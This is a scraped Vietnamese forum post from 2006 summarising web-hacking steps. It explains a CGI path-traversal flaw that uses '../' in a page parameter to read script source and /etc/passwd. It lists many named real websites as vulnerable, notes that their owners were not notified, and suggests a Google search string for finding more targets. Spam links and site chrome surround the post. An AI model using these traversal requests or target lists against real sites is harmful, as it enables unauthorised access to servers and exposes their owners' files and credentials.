Cheap Plane Tickets

Document Sample
Cheap Plane Tickets Powered By Docstoc
					Cheap Plane Tickets|Bad Credit Mortgages|Auto Loan|Personal Loan|Home Loan Vietnam Entertainment Center > Công Nghệ Thông Tin > Thủ thuật Internet > Tóm tắt cách thức tấn công website PDA View Full Version : Tóm tắt cách thức tấn công website

soulevil 09-23-2006, 08:34 PM Trong thời đại hiện nay khi internet được phổ biến rộng rãi, các tổ chức, cá nhân đều có nhu cầu giới thiệu thông tin của mình trên xa lộ thông tin cũng như thực hiện các cuộc giao dịch buôn bán online. Vấn đề nảy sinh là khi phạm vi ứng dụng của các web application ngày càng phổ biến thì khả năng xuất hiện lỗi và bị tấn công càng cao. Trong các lĩnh vực hacking, hack web application là sân chơi khá lý thú cho những ai yêu thích computer security. Thông thường, những bước cơ bản khi thực hiện hack web bao gồm như sau - các bước này ko nhất thiết phải thực hiện tuần tự mà tùy vào điều kiện của chúng ta. 1. Thu thập thông tin ở mức trên về hạ tầng của mục tiêu Bước này ta cần thu thập một số thông tin quan trọng như có bao nhiêu server, mô hình của các web server, các client nào sẽ tương tác với ứng dụng web, kiểu giao tiếp thông tin (transport) và thông qua các cổng (port) nào, những site liên quan đến việc thực hiện chức năng của site mục tiêu.... 2. Khảo sát ứng dụng web Ở đây tôi chỉ mô tả một trong những phương pháp khảo sát khá phổ biến từ trước đến giờ, đó là Xem mã nguồn và lợi dụng các lỗi cho phép xem mã nguồn. Một số ngôn ngữ web thông dụng hiện nay có nhiều lỗi này như Active Server Pages (ASP), Common Gateway Interface (CGI), ColdFusion Server (CFM), Hypertext Preprocessor (PHP). Bài viết này tôi chỉ đề cập đến 1 bug đã có từ lâu nhưng thấy vẫn còn nhiều site mắc phải, đó là lỗi liên quan đến CGI design cho phép view source và file system traversal. Hãy xem ví dụ sau: http://www.earthdayalliance.org/inde...ge=contact.htm Ở đây index.cgi được gọi với tham số truyền vào là trang contact.htm (HTML file) nó sẽ đọc và hiện nội dung của trang này lên client browser. Tuy nhiên nếu người viết cgi ko kiểm tra kĩ lưỡng, ta có thể lợi dụng để xem chính nội dung của file index.cgi hay các trang khác. Ví dụ sau ta sẽ thay contact.htm bằng index.cgi: http://www.earthdayalliance.org/inde...page=index.cgi Ở đây ta gặp 1 thông báo lỗi "error: No such file or directory /web/guide/earthdayalliance/www/content/index.cgi", nguyên nhân là thực tế index.cgi ko nằm trong thư mục hiện hành (tức là ../www/content/) mà nằm ở www, do đó ta sẽ chỉnh lại link 1 chút bằng 1 dot dot slash, như sau:

http://www.earthdayalliance.org/inde...=/../index.cgi Chạy link này ta sẽ thấy nội dung của index.cgi được show trên browser. Việc xem được source có thể giúp ta tìm hiểu kĩ càng hơn về web app, thậm chí nếu may mắn có thể xem được những thông tin quan trọng khác. Lệnh sau là 1 ví dụ dùng lỗi này để xem file etc/passwd trong unix server: http://www.earthdayalliance.org/index.c....d Đây chỉ là 1 ví dụ nhỏ, còn khai thác hay hạn chế thế nào thì tùy khả năng của mỗi người. Các bạn có thể tìm các site bị lỗi này bằng cách dùng www.google.com, search từ khóa liên quan, chẳng hạn như: "index.cgi?page=" Đây là vài link tôi tìm thấy, các bạn có thể tham khảo:

http://www.discountdata.com/index.cgi?page=index.cgi

http://home.no.net/danm2/freezeware/...e=leecher.html http://home.no.net/danm2....d

http://itf.fys.kuleuven.ac.be/worksho....cal.htm http://itf.fys.kuleuven.ac.be/worksho....d

http://www.resource.nl/uk/index.cgi?page=index.cgi

http://www.earthdayalliance.org/inde...ge=contact.htm http://www.earthdayalliance.org/inde...=/../index.cgi http://www.earthdayalliance.org/index.c....d

http://www.nestingeagles.com/index.cgi?page=videoB.htm http://www.nestingeagles.com/index.c...=/../index.cgi http://www.nestingeagles.com/index.c....d

http://www.warehousejewelry.com/cgi-bin....icy.htm http://www.warehousejewelry.com/cgi-...=/../index.cgi http://www.warehousejewelry.com/cgi-bin....tion.pl http://www.warehousejewelry.com/cgi-bin....d

http://demo1.secmod.com/index.cgi?page=links.html http://demo1.secmod.com/index.cgi?page=index.cgi http://demo1.secmod.com/index.cgi?pa.../../etc/passwd

http://www.vintagejournal.com/VJ0901...=/../index.cgi http://www.vintagejournal.com/VJ0901...?page=home.htm

http://www.datadart.com/commerc....tml&car http://www.datadart.com/commercesql/...=/../index.cgi

http://www.gatlinburggateway.com/index.c....d

http://www.berkshire-is.com/index.cgi?page=news.html http://www.berkshire-is.com/index.cgi?page=index.cgi http://www.berkshire-is.com/index.cg.../../etc/passwd

http://www.smokymtnarts-crafts.com/i...?page=otto.htm http://www.smokymtnarts-crafts.com/i...=/../index.cgi

http://www.textileflags.com/cgi-bin....me.html http://www.textileflags.com/cgi-bin....dex.cgi

http://www.randalloglegallery.com/in...page=about.htm http://www.randalloglegallery.com/in...=/../index.cgi ..... Lưu ý các site trên chưa được thông báo về lỗi này. 3. Tấn công các web server 4. Tấn công vượt qua các cơ chế kiểm soát (authentication, authorization) Bao gồm các phương pháp như đoán mật khẩu, làm việc - thay đổi thông tin cookies, các kĩ thuật directory traversal, leo thang đặc quyền, các phương pháp tấn công dựa vào SQL, SQL injection... vBulletin v3.6.1, Copyright ©2000-2007, Jelsoft Enterprises Ltd.